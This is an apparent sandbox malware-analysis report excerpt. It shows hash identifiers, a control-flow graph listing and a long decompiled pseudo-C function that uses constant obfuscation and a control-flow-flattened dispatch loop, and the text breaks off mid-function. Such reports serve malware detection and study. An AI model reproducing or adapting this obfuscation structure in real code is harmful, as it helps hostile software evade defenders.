                                                                        • Instruction ID: bcb940ab0b51ba9aa32f5f7e717e54d56ca378d12b6cd42c33ee8c0488dd72e2
                                                                        • Opcode Fuzzy Hash: 096944ea9d644cbed8a91504d9663a7921678804b23d5a58477bd81ded31b560
                                                                        • Instruction Fuzzy Hash: 4882FF715087808BE3B4CF25C98AB9FBBE1FBC4354F108A1DE6D9962A0D7B58945CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10019DC0, Relevance: 30.8, Strings: 24, Instructions: 774COMMONCrypto
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 447 10019dc0-1001aa08 call 100056b2 450 1001aa0f-1001aa15 447->450 451 1001ad8b-1001ad91 450->451 452 1001aa1b 450->452 455 1001afb3-1001afdc call 100091cd 451->455 456 1001ad97-1001ad9d 451->456 453 1001aa21-1001aa27 452->453 454 1001ad1d-1001ad4e call 1000adbd call 100157e8 452->454 459 1001ab9d-1001aba3 453->459 460 1001aa2d 453->460 499 1001b011-1001b01d 454->499 507 1001ad54-1001ad7b call 1001bd4a 454->507 475 1001afe1-1001afe7 455->475 461 1001ada3-1001ada9 456->461 462 1001af8f-1001afa9 call 10017b6b 456->462 466 1001aba9-1001abaf 459->466 467 1001acdf-1001ad12 call 100106c2 459->467 469 1001ab71-1001ab93 call 100091cd 460->469 470 1001aa33-1001aa39 460->470 463 1001adaf-1001adb5 461->463 464 1001af5e-1001af84 call 10011259 461->464 462->455 473 1001af25-1001af52 call 1000c07d 463->473 474 1001adbb-1001adc1 463->474 464->462 476 1001abb5-1001abbb 466->476 477 1001ac59-1001acd4 call 1000adce 466->477 467->454 469->459 480 1001ab3f-1001ab6c call 100091cd 470->480 481 1001aa3f-1001aa45 470->481 473->464 485 1001adc7-1001adcd 474->485 486 1001aecf-1001af1a call 1000a83a 474->486 475->450 487 1001afed 475->487 476->475 488 1001abc1-1001abd9 476->488 477->467 518 1001aa70-1001aa74 480->518 492 1001aa4b-1001aa51 481->492 493 1001ab0d-1001ab3a call 100091cd 481->493 497 1001add3-1001add9 485->497 498 1001ae9d-1001aec5 call 100091cd 485->498 486->473 487->499 500 1001ac38-1001ac54 488->500 501 1001abdb-1001abdd 488->501 502 1001aa53-1001aa59 492->502 503 1001aa76-1001ab08 call 1001bf25 call 100164ec call 1001c5f7 492->503 493->518 497->475 510 1001addf-1001ae91 call 1001bf25 call 10003482 call 1001c5f7 497->510 498->486 500->450 511 1001abde-1001ac28 call 100060da 501->511 502->475 512 1001aa5f-1001aa6b call 10005856 502->512 503->450 529 1001ad81 507->529 530 1001afef-1001b00e call 100091cd 507->530 510->498 533 1001ac2a-1001ac31 511->533 512->518 518->450 529->451 530->499 533->500
                                                                        C-Code - Quality: 96%
                                                                        			E10019DC0(void* __ecx, void* __edx) {
				void* __edi;
				void* _t760;
				intOrPtr _t823;
				void* _t831;
				signed int _t881;
				short _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				intOrPtr _t902;
				void* _t906;
				signed int _t909;
				signed int _t914;
				signed int _t926;
				signed int _t928;
				signed int _t930;
				short* _t998;
				short* _t999;
				intOrPtr _t1002;
				signed int _t1006;
				short _t1008;
				intOrPtr _t1010;
				void* _t1011;
				void* _t1012;
				void* _t1015;
				void* _t1016;

				_push( *((intOrPtr*)(_t1011 + 0xc9c)));
				_t997 =  *((intOrPtr*)(_t1011 + 0xc94));
				_push( *((intOrPtr*)(_t1011 + 0xc94)));
				_push( *((intOrPtr*)(_t1011 + 0xc9c)));
				_push( *((intOrPtr*)(_t1011 + 0xc94)));
				_push(__edx);
				_push(__ecx);
				E100056B2(_t760);
				 *(_t1011 + 0x114) = 0x5191;
				_t1008 = 0;
				_t1012 = _t1011 + 0x18;
				 *((intOrPtr*)(_t1012 + 0x150)) = 0;
				_t906 = 0x2a5de1a5;
				 *(_t1012 + 0xfc) =  *(_t1011 + 0x114) * 0x56;
				 *(_t1012 + 0xfc) =  *(_t1012 + 0xfc) ^ 0x001b362a;
				 *(_t1012 + 0xf4) = 0x7b48;
				 *(_t1012 + 0xf4) =  *(_t1012 + 0xf4) + 0xfffffae2;
				 *(_t1012 + 0xf4) =  *(_t1012 + 0xf4) ^ 0x0000048e;
				 *(_t1012 + 0x1c) = 0xfb4b;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) >> 0xf;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) + 0xd610;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) | 0xf3105de5;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) ^ 0xf310f378;
				 *(_t1012 + 0x18) = 0x9b1e;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) >> 8;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) ^ 0xb792a5e4;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) | 0xa0a9b449;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) ^ 0xb7bbf9a0;
				 *(_t1012 + 0x148) = 0x8759;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) + 0xffffcbd8;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) ^ 0x0000703f;
				 *(_t1012 + 0x24) = 0x14b0;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) * 0x38;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) | 0xd4c47a9c;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) + 0xffff1c59;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) ^ 0xd4c44860;
				 *(_t1012 + 0xb0) = 0x6232;
				 *(_t1012 + 0xb0) =  *(_t1012 + 0xb0) ^ 0xdc31e630;
				 *(_t1012 + 0xb0) =  *(_t1012 + 0xb0) >> 1;
				 *(_t1012 + 0xb0) =  *(_t1012 + 0xb0) ^ 0x6e1897ce;
				 *(_t1012 + 0x2c) = 0x7298;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) + 0x69dd;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) | 0x6390fda1;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) ^ 0xdd2d2ef6;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) ^ 0xbebdb0ec;
				 *(_t1012 + 0xc0) = 0x228e;
				 *(_t1012 + 0xc0) =  *(_t1012 + 0xc0) ^ 0x1a8b5cf2;
				 *(_t1012 + 0xc0) =  *(_t1012 + 0xc0) * 0xc;
				 *(_t1012 + 0xc0) =  *(_t1012 + 0xc0) ^ 0x3e89f3bf;
				 *(_t1012 + 0x84) = 0x762e;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) * 0x59;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) | 0x558f0020;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) >> 6;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) ^ 0x0156e9fd;
				 *(_t1012 + 0x114) = 0x835d;
				 *(_t1012 + 0x114) =  *(_t1012 + 0x114) << 1;
				 *(_t1012 + 0x114) =  *(_t1012 + 0x114) ^ 0x00012854;
				 *(_t1012 + 0x7c) = 0x96c1;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) << 4;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) + 0xffff53be;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) | 0xfd5d0ed6;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) ^ 0xfd5dc139;
				 *(_t1012 + 0x74) = 0xffcb;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) >> 4;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) + 0xa69f;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) | 0x535a1459;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) ^ 0x535ae4d6;
				 *(_t1012 + 0xc4) = 0xe3;
				 *(_t1012 + 0xc4) =  *(_t1012 + 0xc4) + 0xffffd99b;
				 *(_t1012 + 0xc4) =  *(_t1012 + 0xc4) * 0x50;
				 *(_t1012 + 0xc4) =  *(_t1012 + 0xc4) ^ 0xfff472d0;
				 *(_t1012 + 0x88) = 0xbaa6;
				 *(_t1012 + 0x88) =  *(_t1012 + 0x88) ^ 0xbd6a9f93;
				 *(_t1012 + 0x88) =  *(_t1012 + 0x88) << 7;
				 *(_t1012 + 0x88) =  *(_t1012 + 0x88) ^ 0xb512a337;
				 *(_t1012 + 0xb4) = 0x3531;
				 *(_t1012 + 0xb4) =  *(_t1012 + 0xb4) << 6;
				 *(_t1012 + 0xb4) =  *(_t1012 + 0xb4) >> 0xe;
				 *(_t1012 + 0xb4) =  *(_t1012 + 0xb4) ^ 0x000012d0;
				 *(_t1012 + 0xa8) = 0xe66d;
				 *(_t1012 + 0xa8) =  *(_t1012 + 0xa8) ^ 0x1985e749;
				 *(_t1012 + 0xa8) =  *(_t1012 + 0xa8) << 0x10;
				 *(_t1012 + 0xa8) =  *(_t1012 + 0xa8) ^ 0x01240ff4;
				 *(_t1012 + 0x68) = 0xdadb;
				_t884 = 0x72;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x68) / _t884;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) << 5;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) << 0xd;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) ^ 0x07ac09df;
				 *(_t1012 + 0x11c) = 0xa461;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) + 0xffffc6b7;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) ^ 0x0000386c;
				 *(_t1012 + 0x138) = 0xbe4d;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) + 0xffffcdbc;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) ^ 0x000091a9;
				 *(_t1012 + 0x98) = 0x5b34;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) ^ 0x9869eb0c;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) + 0xffff7c43;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) ^ 0x98694e20;
				 *(_t1012 + 0x90) = 0xb3cb;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) + 0xffff6388;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0x2c5ba937;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0x2c5bd4ce;
				 *(_t1012 + 0x48) = 0x52c0;
				_t885 = 0x62;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) / _t885;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) + 0xffff9124;
				_t886 = 0x2b;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) * 0x41;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) ^ 0xffe43930;
				 *(_t1012 + 0x40) = 0xac8b;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) << 0xd;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) >> 3;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) + 0xa7db;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) ^ 0x02b29829;
				 *(_t1012 + 0x148) = 0x643b;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) / _t886;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) ^ 0x000010f3;
				 *(_t1012 + 0x128) = 0xa997;
				 *(_t1012 + 0x128) =  *(_t1012 + 0x128) << 0xa;
				 *(_t1012 + 0x128) =  *(_t1012 + 0x128) ^ 0x02a66a03;
				 *(_t1012 + 0x38) = 0x7f7f;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) + 0xffffaeb4;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) + 0xffff06c6;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) << 0xf;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) ^ 0x9a7cd3e3;
				 *(_t1012 + 0xa8) = 0xf2f;
				_t887 = 0x4b;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa8) * 0x34;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) * 0x15;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) ^ 0x0040dcde;
				 *(_t1012 + 0x9c) = 0x259b;
				 *(_t1012 + 0x9c) =  *(_t1012 + 0x9c) / _t887;
				 *(_t1012 + 0x9c) =  *(_t1012 + 0x9c) | 0xb0025bdd;
				 *(_t1012 + 0x9c) =  *(_t1012 + 0x9c) ^ 0xb0023f27;
				 *(_t1012 + 0x5c) = 0xf72d;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) + 0xb64c;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) + 0xffff542c;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) >> 3;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) ^ 0x00003f89;
				 *(_t1012 + 0x54) = 0xcb46;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0x17d5c45e;
				_t888 = 0xf;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x54) * 0x28;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x58) * 0x7b;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x58) ^ 0x06ba3f8c;
				 *(_t1012 + 0x130) = 0x1c0d;
				 *(_t1012 + 0x130) =  *(_t1012 + 0x130) << 3;
				 *(_t1012 + 0x130) =  *(_t1012 + 0x130) ^ 0x0000c19e;
				 *(_t1012 + 0x50) = 0x99a2;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) * 0x3c;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) << 2;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) ^ 0x0b9e099b;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) ^ 0x0b0e3d8f;
				 *(_t1012 + 0xdc) = 0xc4f9;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) / _t888;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) ^ 0x00001e9f;
				 *(_t1012 + 0x134) = 0xe9a6;
				_t889 = 0x25;
				 *(_t1012 + 0x134) =  *(_t1012 + 0x134) * 0x38;
				 *(_t1012 + 0x134) =  *(_t1012 + 0x134) ^ 0x00330038;
				 *(_t1012 + 0x104) = 0xfa06;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) + 0xffff4131;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) ^ 0x00007322;
				 *(_t1012 + 0xa4) = 0x3711;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) >> 6;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) + 0x3b98;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) ^ 0x00002f0a;
				 *(_t1012 + 0x24) = 0xdc2f;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) ^ 0xf29ba80e;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) / _t889;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) + 0x267d;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) ^ 0x068eac78;
				 *(_t1012 + 0x54) = 0xb4c2;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) >> 4;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0x633a81e3;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0xd55c9070;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0xb6663903;
				 *(_t1012 + 0xc0) = 0x8be9;
				_t890 = 0x3b;
				 *(_t1012 + 0xbc) =  *(_t1012 + 0xc0) / _t890;
				 *(_t1012 + 0xbc) =  *(_t1012 + 0xbc) + 0xffff9a8b;
				 *(_t1012 + 0xbc) =  *(_t1012 + 0xbc) ^ 0xffffa766;
				 *(_t1012 + 0x78) = 0x5bde;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) * 0x59;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) << 0xd;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) >> 9;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) ^ 0x007f2aa6;
				 *(_t1012 + 0x90) = 0x411a;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0xcf7ab9d1;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) >> 7;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0x019eb365;
				 *(_t1012 + 0xe0) = 0x6764;
				 *(_t1012 + 0xe0) =  *(_t1012 + 0xe0) ^ 0xbe6d5056;
				 *(_t1012 + 0xe0) =  *(_t1012 + 0xe0) ^ 0xbe6d5d89;
				 *(_t1012 + 0x108) = 0x76f2;
				 *(_t1012 + 0x108) =  *(_t1012 + 0x108) ^ 0xb105586c;
				 *(_t1012 + 0x108) =  *(_t1012 + 0x108) ^ 0xb10528cb;
				 *(_t1012 + 0xe8) = 0x1628;
				 *(_t1012 + 0xe8) =  *(_t1012 + 0xe8) << 0xf;
				 *(_t1012 + 0xe8) =  *(_t1012 + 0xe8) ^ 0x0b146bd8;
				 *(_t1012 + 0x13c) = 0x8150;
				 *(_t1012 + 0x13c) =  *(_t1012 + 0x13c) ^ 0x01db2c46;
				 *(_t1012 + 0x13c) =  *(_t1012 + 0x13c) ^ 0x01dbc499;
				 *(_t1012 + 0x28) = 0xe57d;
				 *(_t1012 + 0x28) =  *(_t1012 + 0x28) + 0xffff940d;
				_t891 = 0x52;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x28) * 0xa;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) / _t891;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) ^ 0x00002d62;
				 *(_t1012 + 0xd4) = 0xda51;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) << 8;
				_t892 = 0x2f;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) / _t892;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) ^ 0x0004b460;
				 *(_t1012 + 0x144) = 0xc4bd;
				 *(_t1012 + 0x144) =  *(_t1012 + 0x144) | 0x99168015;
				 *(_t1012 + 0x144) =  *(_t1012 + 0x144) ^ 0x991680ca;
				 *(_t1012 + 0x4c) = 0xf40b;
				_t893 = 0xf;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x4c) * 0x64;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) >> 0x10;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) + 0x4d44;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) ^ 0x00003d1f;
				 *(_t1012 + 0x80) = 0xe0fb;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x7a83a018;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x3dd3f5db;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x2cc23c84;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x6b92f75e;
				 *(_t1012 + 0x40) = 0x3ba;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) + 0xe0c2;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) * 0x6e;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) + 0x8785;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) ^ 0x00629da9;
				 *(_t1012 + 0x110) = 0xc1c4;
				 *(_t1012 + 0x110) =  *(_t1012 + 0x110) ^ 0xb305b232;
				 *(_t1012 + 0x110) =  *(_t1012 + 0x110) ^ 0xb3050daf;
				 *(_t1012 + 0x138) = 0x83df;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) ^ 0x6f2297cb;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) ^ 0x6f221ab4;
				 *(_t1012 + 0xec) = 0xe7e3;
				 *(_t1012 + 0xec) =  *(_t1012 + 0xec) >> 0xe;
				 *(_t1012 + 0xec) =  *(_t1012 + 0xec) ^ 0x00003f29;
				 *(_t1012 + 0x6c) = 0x9be6;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) | 0xdb39baf6;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) * 0xe;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) << 4;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) ^ 0xd2843690;
				 *(_t1012 + 0x98) = 0x25e5;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) * 0x5f;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) + 0xf2a9;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) ^ 0x000f50c4;
				 *(_t1012 + 0xf0) = 0x6aad;
				 *(_t1012 + 0xf0) =  *(_t1012 + 0xf0) >> 0xb;
				 *(_t1012 + 0xf0) =  *(_t1012 + 0xf0) ^ 0x00000b06;
				 *(_t1012 + 0x11c) = 0xe6d7;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) * 0x44;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) ^ 0x003d0209;
				 *(_t1012 + 0x58) = 0xa945;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x58) / _t893;
				_t894 = 0x22;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x58) / _t894;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) + 0x1aba;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) ^ 0x00003b06;
				 *(_t1012 + 0x64) = 0x44c5;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) + 0x4f06;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) << 0xe;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) >> 0xb;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0x0004ce26;
				 *(_t1012 + 0x3c) = 0xcc93;
				_t895 = 0x1a;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) / _t895;
				_t896 = 0x29;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) / _t896;
				_t897 = 0x77;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) / _t897;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) ^ 0x000043f4;
				 *(_t1012 + 0x12c) = 0xa0a2;
				 *(_t1012 + 0x12c) =  *(_t1012 + 0x12c) ^ 0x7e84551b;
				 *(_t1012 + 0x12c) =  *(_t1012 + 0x12c) ^ 0x7e84971f;
				 *(_t1012 + 0x74) = 0xdad7;
				_t898 = 0x26;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) / _t898;
				_t899 = 0x42;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) * 0x48;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) + 0xffff34f2;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) ^ 0x0000936e;
				 *(_t1012 + 0x34) = 0x892d;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) >> 6;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) ^ 0xe5fcb6e4;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) << 4;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) ^ 0x5fcb3f6d;
				 *(_t1012 + 0xfc) = 0x9a3e;
				 *(_t1012 + 0xfc) =  *(_t1012 + 0xfc) / _t899;
				 *(_t1012 + 0xfc) =  *(_t1012 + 0xfc) ^ 0x00006544;
				 *(_t1012 + 0x124) = 0x2293;
				 *(_t1012 + 0x124) =  *(_t1012 + 0x124) + 0x79b;
				 *(_t1012 + 0x124) =  *(_t1012 + 0x124) ^ 0x00006b1d;
				 *(_t1012 + 0xbc) = 0x3e81;
				_t900 = 7;
				 *(_t1012 + 0xb8) =  *(_t1012 + 0xbc) * 0x31;
				 *(_t1012 + 0xb8) =  *(_t1012 + 0xb8) + 0xb35c;
				 *(_t1012 + 0xb8) =  *(_t1012 + 0xb8) ^ 0x000cf45c;
				 *(_t1012 + 0x64) = 0x7cb6;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0x88e3463d;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) * 0x56;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) << 0xf;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0xd559658e;
				 *(_t1012 + 0xac) = 0xf45a;
				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) / _t900;
				_t901 = 0x60;
				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) * 0x3e;
				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) ^ 0x000800e5;
				 *(_t1012 + 0xe4) = 0xf8f;
				 *(_t1012 + 0xe4) =  *(_t1012 + 0xe4) >> 4;
				 *(_t1012 + 0xe4) =  *(_t1012 + 0xe4) ^ 0x0000477d;
				 *(_t1012 + 0xdc) = 0xf07b;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) >> 0xb;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) ^ 0x00007281;
				 *(_t1012 + 0xd4) = 0xb5b1;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) << 0xd;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) + 0xffff2f0a;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) ^ 0x16b57b93;
				 *(_t1012 + 0x10c) = 0xd67e;
				 *(_t1012 + 0x10c) =  *(_t1012 + 0x10c) ^ 0x498b92c7;
				 *(_t1012 + 0x10c) =  *(_t1012 + 0x10c) ^ 0x498b23c9;
				 *(_t1012 + 0xcc) = 0x2221;
				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) << 2;
				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) >> 6;
				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) ^ 0x0000659f;
				 *(_t1012 + 0x104) = 0x2a0b;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) >> 4;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) ^ 0x000066a5;
				 *(_t1012 + 0xc8) = 0x810d;
				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) / _t901;
				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) << 0x10;
				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) ^ 0x01580000;
				_t902 =  *((intOrPtr*)(_t1012 + 0x158));
				 *((intOrPtr*)(_t1012 + 0x14)) =  *((intOrPtr*)(_t1012 + 0x15c));
				 *((intOrPtr*)(_t1012 + 0x154)) = _t902;
				while(1) {
					_t1015 = _t906 - 0x1e362325;
					if(_t1015 > 0) {
						goto L30;
					}
					L2:
					if(_t1015 == 0) {
						_push(_t906);
						_t1001 = E1000ADBD( *((intOrPtr*)(_t997 + 4)));
						_t902 = E100157E8(_t838);
						 *((intOrPtr*)(_t1012 + 0x158)) = _t902;
						__eflags = _t902;
						if(__eflags != 0) {
							_t823 = E1001BD4A( *(_t1012 + 0xc0),  *(_t1012 + 0x3c), __eflags, _t902,  *(_t1012 + 0xcc), _t1001,  *_t997,  *((intOrPtr*)(_t997 + 4)));
							_t1012 = _t1012 + 0x14;
							 *((intOrPtr*)(_t1012 + 0x14)) = _t823;
							__eflags = _t823;
							if(__eflags == 0) {
								E100091CD( *(_t1012 + 0x90),  *((intOrPtr*)(_t1012 + 0x120)),  *(_t1012 + 0x84), _t902,  *(_t1012 + 0x74));
							} else {
								_t906 = 0x30070f42;
								goto L13;
							}
						}
					} else {
						_t1016 = _t906 - 0x12f44b45;
						if(_t1016 > 0) {
							__eflags = _t906 - 0x1993ee00;
							if(_t906 == 0x1993ee00) {
								_t926 = _t1012 + 0x17c;
								E100106C2(_t926,  *(_t1012 + 0xb4),  *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0x11c), _t1012 + 0x158);
								_t1012 = _t1012 + 0xc;
								asm("sbb ecx, ecx");
								_t906 = (_t926 & 0x08d2d6d7) + 0x3077984c;
								goto L10;
							} else {
								__eflags = _t906 - 0x1bb47d9a;
								if(_t906 == 0x1bb47d9a) {
									 *(_t1012 + 0x164) =  *(_t1012 + 0xc8);
									 *(_t1012 + 0x168) =  *(_t1012 + 0x168) & 0x00000000;
									_t928 =  *(_t1012 + 0x168);
									E1000ADCE(_t928,  *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0xa4), _t1012 + 0x1a4,  *(_t1012 + 0x5c),  *(_t1012 + 0x128), _t1012 + 0x29c, _t1012 + 0x17c, _t1012 + 0x168,  *((intOrPtr*)(_t1012 + 0x140)),  *((intOrPtr*)(_t1012 + 0x16c)), _t1012 + 0x488);
									_t1012 = _t1012 + 0x28;
									asm("sbb ecx, ecx");
									_t906 = (_t928 & 0x1b5b9d4f) + 0x12f44b45;
									goto L10;
								} else {
									__eflags = _t906 - 0x1bef9ca6;
									if(_t906 != 0x1bef9ca6) {
										goto L44;
									} else {
										_t998 = _t1012 + 0x288;
										_t930 = 6;
										_t1010 =  *(_t1012 + 0x14c) % _t930 + 1;
										__eflags = _t1010;
